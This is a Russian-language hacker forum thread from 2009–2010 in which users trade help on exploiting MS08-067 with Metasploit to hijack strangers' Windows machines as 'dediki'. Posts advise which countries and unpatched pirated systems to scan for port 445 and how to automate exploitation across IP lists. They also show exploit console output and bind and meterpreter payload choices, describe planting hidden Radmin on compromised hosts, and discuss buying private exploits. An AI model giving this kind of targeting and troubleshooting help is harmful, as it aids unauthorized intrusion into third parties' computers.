18:39:09 - Session 2 created for 192.168.1.240:1074
18:39:11 - Session 2 closed for 192.168.1.240:1074



фаервол отсутствует даже виндовый

eNergy
18.10.2009, 17:40
не запускается gui интерфейс что делать в чем проблема операционка xp sp3
переустанавливал уже 2 раза

DeepBlue7
19.10.2009, 20:08
Хехе... вот над своей домашней локалкой щас стебаюсь по жесткому Ж)

Artyr_006
27.10.2009, 22:11
У меня после обнавления метасплоита всё получилось!!! ура!! круто

freelsd
28.10.2009, 04:24
metasploit лежит, можете залить на файлопомойку?

stopxaker
28.10.2009, 04:36
metasploit лежит, можете залить на файлопомойку?


Качай с офсайта , всё работает http://spool.metasploit.com/releases/framework-3.2.exe

Artyr_006
28.10.2009, 07:10
Никак не могу найти ИП с открытым 445((((
Плиз подскажите хоть страну в которой сканитьь

Xpark
28.10.2009, 11:48
а зачем, уязвимость эта уже не актуальна, только в локалке!!!!

ozs
28.10.2009, 12:33
на vnc и то больше попадается

eNergy
28.10.2009, 18:22
на vnc и то больше попадается
а это что еще такое?

Xcontrol212
28.10.2009, 19:00
http://www.google.ru/#hl=ru&source=hp&q=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC+VNC+%D0%B4%D0%B5% D0%B4%D0%B8%D0%BA%D0%BE%D0%B2&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=&aq=f&oq=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC+VNC+%D0%B4%D0%B5 %D0%B4%D0%B8%D0%BA%D0%BE%D0%B2&fp=be4313e544833b95
http://www.hackzone.ru/forum/open/id/5380/
ПРо взлом VNC

M@ZAX@KEP
24.11.2009, 18:23
Плиз подскажите хоть страну в которой сканитьь
Если бы внимательно прочитал первые несколько страниц темы, знал бы что надо Россию сканить.


уязвимость эта уже не актуальна

блин... ты серьёзно? Хочешь сказать что не осталось в России WinXP SP2/3 пиратских, которые не обновляются и у котрых есть эта уязвимость?

M@ZAX@KEP
25.11.2009, 22:55
1) Есть-ли вероятность того, что в поисках дедика мы заломимся на комп обычного юзера и он его будет включать раз в сутки? :mad: Или открытый порт 445 - главный признак dedicated server-а?

2) Можно-ли как-то автоматизировать процесс применения эксплойта к списку ip-шников? Перебирать врукопашную по одному как-то не айс. :(

3) Юзаю этот сплойт через веб-интерфейс метасплойта, и там есть один обязательный параметр: LHOST (The local address). Если я правильно понял, то там должен быть мой ip в тырнете. (не локалхост 127.0.0.1 и не локалка 192.168.10.1)
Чтож, указываю свой ип (80.***.90.10), запускаю и получаю в такую новость:
____________________________________________
Started reverse handler on port 4444
Automatically detecting the target...
Fingerprint: Windows XP Service Pack 2 - lang:Russian
Selected Target: Windows XP SP2 Russian (NX) //по идее, уязвим
Triggering the vulnerability...
Exploit completed, but no session was created. //тваюж! опять?!
____________________________________________

Вопрос вот в чём: может-ли быть такое, что сессия не запускается из-за того, что у меня внутренний ip в городской сети, и ко мне можно только из этой сети подключиться (сам я точно не знаю, так это или нет)? У меня статический ip от Волгателеком, если это важно.

4) Как вообще определить, можно ко мне с внешки подключиться или нет?

___________________________________________

4 дня уже без ответа... :confused: И тишина... и мёртвые с ко... Э! А где мёртвые?! :D

Lacoste-Crocodile
04.12.2009, 20:10
2ip.ru
там нажми "проверка порта на доступность"
введи 4444
тыкни проверить
если открыт то все норм, если закрыт то не норм)

Fooog
04.12.2009, 20:43
Мазахакер, аж статью из вопросов накатал))
Ответ на первое Есть. Но вероятность маленькая!

M@ZAX@KEP
05.12.2009, 12:51
Спасибо, осталось ещё несколько вопросов xD
Lacoste-Crocodile, порт закрыт, пошёл гуглить чё он даёт и как его открывают xD

Linkus
08.12.2009, 16:48
а какими ещё эксплоитами можно получить shell?

jasd
10.12.2009, 18:44
скажите что делать?
скачал и установил Metasploit Framework 3.3.1 запускаю консоль а там вот что :
" Configuring multi-user permissions for first run..."
пишу команды не реагирует

navigat0r
10.12.2009, 19:33
на свою учетку сделай права админа, если не ошибаюсь, то так

shellz[21h]
10.12.2009, 19:51
2) Можно-ли как-то автоматизировать процесс применения эксплойта к списку ip-шников? Перебирать врукопашную по одному как-то не айс.
http://blog.metasploit.com/2006/09/metasploit-30-automated-exploitation.html
Cам сканит и применяет сплойт(ы)

Linkus
12.12.2009, 00:54
скажите что делать?
скачал и установил Metasploit Framework 3.3.1 запускаю консоль а там вот что :
" Configuring multi-user permissions for first run..."
пишу команды не реагирует

имей терпение! )))

а у меня вообще ошибки какие то левые выскакивают. Metasploit пашет тока на виртуалке. (( такой вот изврат

M@ZAX@KEP
12.12.2009, 13:56
shellz[21h], респект те!

ЗЫ теперь придёца всегда вот так... потомушта плюсы всё-равно не отображаются, а кнопки "спс" нету((

а какими ещё эксплоитами можно получить shell?

Да любыми! Главное чтоб была уязвимость на атакуемой тачке.

jasd
15.12.2009, 22:16
почему когда пишу в консоли метасплоита : use ms08_067_netapi, пишет :Failed to load module: ms08_067_netapi. в чем проблема и как решить?

M@ZAX@KEP
16.12.2009, 11:43
Ответ на твой вопрос есть где-то здесь (https://forum.antichat.ru/showthread.php?t=21599).

jasd
16.12.2009, 17:41
эту статью читал, но ответа в ней не нашел. кто еще что скажет?

SEWERN
26.12.2009, 00:56
кто юзает , подскажите - сейчас какой пробив , есть хотябы 10-20% ?

warwar
02.01.2010, 17:22
SP3 не актуально?

cracker
21.01.2010, 17:01
народ подскажите какие сплоиты есть под sp3?

Spaz
22.01.2010, 17:25
народ подскажите какие сплоиты есть под sp3?
рпарарав

sgopik
28.01.2010, 03:24
x`nf у меня руки не от туда растут плиз дайти пару дедико плизззз!

Roston
28.01.2010, 08:32
https://forum.antichat.ru/thread171119.html

e[X]theta[M]ine
28.01.2010, 12:00
Толковая вещь! Автор молодец :) у меня примерно 10-15% получается заполучитb!

naumV
17.02.2010, 05:23
очень прошу подскажите как запустить эту меню?
http://stopxaker.ru/imeg/screen.png

скачал и установил Metasploit Framework 3.3.3, перегрузился, запускаю Metasploit Web оно открываецо в браузере... оно мне то не нужно а мне нужно вотета менюха что на картинке. Я поперетыкивал все ярлыки и так и нечего не добился(((

как же всётаки открыть этот злощясный GUI окно.
Плиз подскажите.

Texhnolyze
17.02.2010, 21:47
Как диапазон сканить?Сканил по сайту какому-то,вроде нормально должно было быть,но всё по нулям....

emillord
17.02.2010, 21:56
скачал и установил Metasploit Framework 3.3.3, перегрузился, запускаю Metasploit Web оно открываецо в браузере... оно мне то не нужно а мне нужно вотета менюха что на картинке. Я поперетыкивал все ярлыки и так и нечего не добился(((

как же всётаки открыть этот злощясный GUI окно.
Плиз подскажите.
Пока на этой версии нет GUI.
Скачай Metasploit Framework 3.2 когда установишь запусти Metasploit 3 GUI


Как диапазон сканить?Сканил по сайту какому-то,вроде нормально должно было быть,но всё по нулям....
Ищи диапазоны сам. Тебе никто не скажет. Я находил сам вручную, когда-то давно.

Андрей021
21.02.2010, 02:27
Не запускается Metasploit 3 GUI, выдаёт ошибку. Удалял, переустанавливал сто раз, толку ноль :confused:
http://s004.radikal.ru/i206/1002/c8/7b76d6b04fbb.jpg

Андрей021
21.02.2010, 12:23
Не запускается Metasploit 3 GUI, выдаёт ошибку. Удалял, переустанавливал сто раз, толку ноль :confused:
Решил проблему заменой двух библиотек в system32 из папки с метасплоитом xmltok.dll и xmlparse.dll. Всем спасибо :)

Steker
21.02.2010, 21:19
При запуске Metasploit 3.3 (все равно консоли или Web) где то на секунду поевляется окно bash, и после метасплоит не подает никаких признаков жизни. С 3.2 все нормально. В чем может быть дело?

SJlaBKo
23.02.2010, 17:02
При запуске Metasploit 3.3 (все равно консоли или Web) где то на секунду поевляется окно bash, и после метасплоит не подает никаких признаков жизни. С 3.2 все нормально. В чем может быть дело?
Такая же проблема

Steker
23.02.2010, 18:00
Такая же проблема
У тебя случано папка пользователя не русскими буквами написана?

SJlaBKo
23.02.2010, 20:08
Я уже себе metasploit 3.2 поставил и норм!)

warwar
23.02.2010, 20:59
Эта тема уже очень стара... Пользуемся привaт сплоитами.

v0l0d1ka
25.02.2010, 18:30
В параметрах сплойта необходимо указать локальный адрес - LHOST. Подскажите, как узнать, свой локальный адрес? Для выхода в интернет использую коммутируемый доступ(dial-up).
P.S.
Как вариант получения локального адреса - в сканнере angry ip scanner 2.21, кликнуть по кнопке IP, в то время как в поле hostname, отображается имя моего компьютера. Вот результат: 192.168.239.1, но я не уверен, что это правильно.

v0l0d1ka
26.02.2010, 13:56
В параметрах сплойта необходимо указать локальный адрес - LHOST. Подскажите, как узнать, свой локальный адрес?

В LHOST нужно указать внешний ip адрес.

walter
26.02.2010, 13:57
В LHOST нужно указать внешний ip адрес.
после?

v0l0d1ka
01.03.2010, 16:10
А после этого можно запускать сплойт(там есть дополнительные параметры по настройке, но самому разобраться тяжко).
Я пробовал сплойт, но все время получаю облом. Может файер стоит или патч, не знаю что там у них. Попробую под Слакой проделать то же самое, может винда для этой задачки не очень подходит. Кстати, на эту тему есть хорошая статейка, вроде как "Массрутинг в сети". Кто хочет найдет.
Если под Unix получиться получить шелл, то отпишусь.

Houze
03.03.2010, 12:48
А если машина за НАТом находится - как отсканировать порты?

mailbrush
03.03.2010, 19:55
Скачал Metasploit 3.3. Открылась консолька. Нигде не могу найти GUI-приложение... Как мне открыть win-интерфейс MS?

Заранее спасибо.

Houze
03.03.2010, 21:06
Скачал Metasploit 3.3. Открылась консолька. Нигде не могу найти GUI-приложение... Как мне открыть win-интерфейс MS?

Заранее спасибо.

ГУИ в 3,3 нет. там только консолька насколько мне извесно.

547
03.03.2010, 23:48
зато точно знаю в 3.2 есть гуи! а запускается гуи по обычному через пуск:)

Houze
04.03.2010, 19:46
с под линукса все как-то веселей работает.

mailbrush
05.03.2010, 18:01
Скачал 3.2, открыл GUI, сделал все, как в статье, но после этого в Sessions ничего не появляется, просто пропадает окно, и все. Причем тестировал на двух удаленных компьютерах и одном локальном, который соединен с моим компом по сети.

Melting
06.03.2010, 00:41
Сейчас есть в паблике сплойты аналогичные MS08-067_netapi , но не такие древние?
Где бы прикупить прив. сплт.?

mailbrush
06.03.2010, 11:48
Скачал 3.2, открыл GUI, сделал все, как в статье, но после этого в Sessions ничего не появляется, просто пропадает окно, и все. Причем тестировал на двух удаленных компьютерах и одном локальном, который соединен с моим компом по сети.
Так что с этим?

$n@ke
06.03.2010, 17:06
мб не пробивает сплойт?

Blatant
07.03.2010, 02:35
Скачал 3.2, открыл GUI, сделал все, как в статье, но после этого в Sessions ничего не появляется, просто пропадает окно, и все. Причем тестировал на двух удаленных компьютерах и одном локальном, который соединен с моим компом по сети.
Если вы применили сплойт на компьютер с открытым портом 445 и в Sessions ничего не появилось, значит, на этом компьютере уязвимость не работает. Это нормально, пробуйте другие.

mazder
08.03.2010, 01:56
Здравствуйте! Уважаемые хакеры, я вот пытаюсь получить доступ к машине.., но! Просканировав Xspider'ом я узнал IP уязвимых тачек к ms08-067, далее добавляю в Metasploit уязвимость по ms08_067_netapi generic/shell_bind_tcp, задаю адрес жертвы, нажимаю применить, появляется активная сессия.. но больше я сделать ничего не могу! В метасплоите Window-Console пишу, например sessions -i 1, и ничего не происходит, ведь как я понимаю я должен получить доступ к тачке.. почему у меня консоль в метасплоите не риагирует на запросы?? Metasploit 3.2 :confused: ..... http://img130.imageshack.us/img130/2845/123cf.jpg

Blatant
08.03.2010, 05:13
Здравствуйте! Уважаемые хакеры, я вот пытаюсь получить доступ к машине.., но! Просканировав Xspider'ом я узнал IP уязвимых тачек к ms08-067, далее добавляю в Metasploit уязвимость по ms08_067_netapi generic/shell_bind_tcp, задаю адрес жертвы, нажимаю применить, появляется активная сессия.. но больше я сделать ничего не могу! В метасплоите Window-Console пишу, например sessions -i 1, и ничего не происходит, ведь как я понимаю я должен получить доступ к тачке.. почему у меня консоль в метасплоите не риагирует на запросы?? Metasploit 3.2 :confused: .....
Судя по скрину, это консоль метасплойта а не машины.
Двойной клик по самой сессии - тогда откроется консоль самой машины.

mazder
08.03.2010, 05:46
сделал.. кликнул 2 раза по сессии, и все равно ничего не происходит..(скрин ниже)
http://img9.imageshack.us/img9/7920/1111uq.jpg

вот еще проблема при выборе например windows/meterpreter/bind_tcp выдает ошибку - как на скрине ниже.. что делать?? =((
http://img94.imageshack.us/img94/2321/1111dn.jpg

Patr1k™
08.03.2010, 06:43
Ребята, способ настолько устаревший, и работает он насколько я знаю только на xp sp1 и ниже.. Тему давно в архив пора положить, давно уже есть более простые и лучшие способы "Добычи деда".

Roston
08.03.2010, 12:29
Ребята, способ настолько устаревший, и работает он насколько я знаю только на xp sp1 и ниже.. Тему давно в архив пора положить, давно уже есть более простые и лучшие способы "Добычи деда".

Например?

Patr1k™
08.03.2010, 22:19
Например?

Чем брут не устраивает?

cheater_man
08.03.2010, 22:22
Ребята, способ настолько устаревший, и работает он насколько я знаю только на xp sp1 и ниже.. Тему давно в архив пора положить, давно уже есть более простые и лучшие способы "Добычи деда".
Эй чувак ты походу не в теме :confused: эта уязвимость была найдена в 06 году, а устранили её 08 году, так что очень много чего с ней связано...

Patr1k™
08.03.2010, 22:37
Я понимаю, я просто к тому говорю, что это не совсем продуктивный способ добычи. Ведь тема одноимённая "Добыча деда".

mazder
09.03.2010, 17:53
проблема еще есть! _)) http://forum.antichat.ru/showpost.php?p=1962805&postcount=627

Blatant
09.03.2010, 23:41
Я понимаю, я просто к тому говорю, что это не совсем продуктивный способ добычи. Ведь тема одноимённая "Добыча деда".
То что не продуктивно - должно быть понятно уже из шапки темы :) Этот сплойт подойдёт скорее для взлома единичного дедика, есть шанс что нужный дед в сети с 445 портом будет с незалатанной дыркой.
Ну или, например, как конкретно я использовал - сбрутил дед десятимегабитный, и до кучи в его локальной сети метасплойтом взял 3 ХР из 20 с чем-то машин, которые там стоят. Все тоже 10-мегабитные. Плохо ли? :)

проблема еще есть! _)) http://forum.antichat.ru/showpost.php?p=1962805&postcount=627
Хм, странная тема... Не пашет по ходу, пробуй другие...

mazder
10.03.2010, 03:43
я конечно извеняюсь, но какие другие? Если есть аналоги метасплоита, скажите пожалуйста.. странно что не работает(( у меня лицензионная винда постоянно качает обновления, может из-за этого??

stopxaker
10.03.2010, 08:22
я конечно извеняюсь, но какие другие? Если есть аналоги метасплоита, скажите пожалуйста.. странно что не работает(( у меня лицензионная винда постоянно качает обновления, может из-за этого??

То что твой лицензионный Windows качает обновления это очень даже хорошо для тебя и твоей безопасности , но это тут не причём ! Метасплойт пробивает именно тебе Windows на которых нету этих заплаток и обновлений ! ;) так что делай выводы сам .
По поводу того если ли что нить подобное , ну конечно же есть , это приват связки эксплойтов , троянов и бэкдоров !

Blatant
11.03.2010, 01:11
но какие другие?
Пробовать пробивать другие машины с открытым 445, пробовать с других дедиков работать с метасплойтом
Если вы вообще с дедика работаете :))

G1G
11.03.2010, 05:03
Жестокий баян . Да еще все показано для GUI , приучали бы народ к консоли .. Толку больше было бы.

Лаврентий
11.03.2010, 12:02
А вот смотрите,запустил Metasploit 3.2
http://s45.radikal.ru/i110/1003/8e/db7cf12b831f.jpg
А как само вот это окошко открыть?Первый раз что то сделал открылося,а сейчас все перетыкал ни как найти не могу как его открыть.Подскажите плиз.
http://s59.radikal.ru/i163/1003/35/4518da97297f.jpg

stopxaker
11.03.2010, 12:47
Metasploit GUI.exe ищи файл !

Лаврентий
11.03.2010, 13:32
С этим разобрался,а вот эксплойт MS08-067 нету.Как эту проблему решить?
http://s004.radikal.ru/i206/1003/17/73ae95a9c25f.jpg

G1G
11.03.2010, 15:49
Обновление запусти . Появится.

Лаврентий
11.03.2010, 15:58
Обновление запусти . Появится.
Обновил-как было так и осталося.Тут дело в чем то другом.

G1G
11.03.2010, 16:02
Обновил-как было так и осталося.Тут дело в чем то другом.

В общем сейчас запишу видео урок , только придется искать потенциально уязвимый дедик , мб для примера кто нить подкинет ип ? Самому сидеть искать лень )

Blatant
11.03.2010, 20:06
Обновил-как было так и осталося.Тут дело в чем то другом.
В метасплойте 3.2 данный сплойт доступен и без обновления.
Вверху окна, если вы не заметили, находится строка поиска. Вбиваете туда название сплойта и находите его.

MaKLuNy
13.03.2010, 20:05
Подскажите такая вот проблема!все сделал как в статье все получилось!вижу в его процесах радмина ,но через вьювера не могу подкл пишет что не удалось соедениться в чем может быть проблема подскажите плиз.

MaKLuNy
13.03.2010, 20:11
В общем сейчас запишу видео урок , только придется искать потенциально уязвимый дедик , мб для примера кто нить подкинет ип ? Самому сидеть искать лень )


давай запиши глянем

Лаврентий
14.03.2010, 00:44
Нашел я видео по этому делу,качайте http://depositfiles.com/files/glmy1jdle

MaKLuNy
16.03.2010, 00:44
Нашел я видео по этому делу,качайте http://depositfiles.com/files/glmy1jdle


ну че у тебя получилось????

Лаврентий
16.03.2010, 15:21
ну че у тебя получилось????
Видео не мое,а так получилося все.Проблема была не 445 порт найти,а найти из того что я сканил уязвимый дед.На самом деле гиморойно это все.Брутом намного проще будет наверное :)

MaKLuNy
16.03.2010, 19:39
Видео не мое,а так получилося все.Проблема была не 445 порт найти,а найти из того что я сканил уязвимый дед.На самом деле гиморойно это все.Брутом намного проще будет наверное :)

у меня в каком то смысле тоже получилось)))!все сделал как в статье подкл через вьювер пишет что не удалось устоновить подкл!хотя командой tasklist d его процесахх фигурирует скрытый радмин!не знаю в чем проблема,мож подскажешь че???

Dodg
18.03.2010, 13:28
Установил МС 3.2 GUI незнаю как запустить подскажите ребят(

Dodg
19.03.2010, 00:48
К примеру у меня нет фтп сервера... без него можно обойтись?

Billy_Rays
08.04.2010, 14:50
у меня в каком то смысле тоже получилось)))!все сделал как в статье подкл через вьювер пишет что не удалось устоновить подкл!хотя командой tasklist d его процесахх фигурирует скрытый радмин!не знаю в чем проблема,мож подскажешь че???
Я тоже сталкивался с такой ситуацией , т.е. зашел через shell,подключился к ftp, кинул Radmin server, запускал его а при подключении получал ошибку. И еще вопрос , есть ли где нить еще подобное описание на русском распространенных эксплойтов (актуальных сейчас 2009-2010), а то ms08_067_netapi хоть и есть в наличии, но уже трудновато ее находить.Если кто знает где есть инфа плиз киньте ссылку .